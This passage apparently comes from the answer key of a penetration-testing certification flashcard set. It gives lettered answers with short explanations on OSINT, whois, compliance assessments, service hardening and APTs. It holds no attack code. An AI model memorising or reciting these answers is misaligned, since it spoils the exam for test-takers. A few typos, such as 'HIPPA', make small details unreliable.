1. A. In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.

Answer 968

1. D. Passive reconnaissance is also known as open source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

Answer 969

1. A. Whois can potentially reveal a great deal of information about a target organization, including the following: * The domain registrar * The registrant’s legal name * The registrant’s address * The registrant’s phone number * A contact email address * The name of the domain administrator * Some organizations ask their registrar to hide this information from the public.

Answer 970

1. C. Because patient records are protected by the HIPPA law in the United States, this is an example of a compliance assessment. Compliance-based assessments are designed to test compliance with specific laws. Objective-based assessments are usually designed to assess the overall security of an organization. Gray box and white box assessments identify the level of knowledge the attacker has of the organization.

Answer 971

1. A. In this scenario, since there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client only uses post 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.

Answer 972

1. A. An advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.

Answer 973

1. B. To harden a server system, you should make sure all user accounts have a password assigned to them. One way to do this is to review the /etc/shadow file and look for any accounts that don’t have a password assigned.

Answer 974

1. D. The host is probably a web server. The system administrator has likely changed the default web server ports to nonstandard ports in an attempt to hide its function. This is an example of “security by obscurity.”

Answer 975

1. B and D. Application programming interface (API) documentation describes how software components communicate. Software development kits (SDKs) also come with documentation. Organizations may create their own SDKs, use commercial SDKs, or use open source SDKs. Understanding which SDKs are in use and where they are can help a penetration tester test applications, especially those written in-house.

Sybex Flashcards

(1000 cards)